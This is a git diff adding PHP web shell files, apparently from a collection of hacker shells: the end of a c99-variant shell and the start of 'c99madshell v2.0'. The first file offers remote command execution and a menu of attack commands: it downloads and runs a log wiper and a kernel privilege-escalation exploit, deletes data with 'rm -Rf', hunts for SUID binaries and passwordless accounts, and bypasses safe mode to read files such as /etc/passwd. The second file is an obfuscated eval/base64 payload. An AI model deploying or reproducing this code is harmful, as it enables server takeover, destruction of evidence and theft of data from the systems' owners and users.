+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+?> 
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>
+   <b>..:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::..</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>
+   <b>..:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::..</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>..:: Make Dir ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+  <b>..:: Make File ::..</b>
+  <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>..:: Go Dir ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+  <b>..:: Go File ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b><img src="../../My Documents/My Pictures/yes2.gif" width="42" height="30">--[ c2007shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Adora &amp; u9 h4c93r| <a href=""><font color="#FF0000">Adora Security Pwnz j00! </font></a> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b><img src="../../My Documents/My Pictures/yes2.gif" width="42" height="30"></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/c99madshell_v2.0.php.php.txt b/xakep-shells/PHP/c99madshell_v2.0.php.php.txt
new file mode 100644
index 0000000..8d3afa4
--- /dev/null
+++ b/xakep-shells/PHP/c99madshell_v2.0.php.php.txt
@@ -0,0 +1,7 @@
+<?php
+             //Authentication
+$login = ""; //Login
+$pass = "";  //Pass
+$md5_pass = ""; //If no pass then hash
+eval(gzinflate(base64_decode('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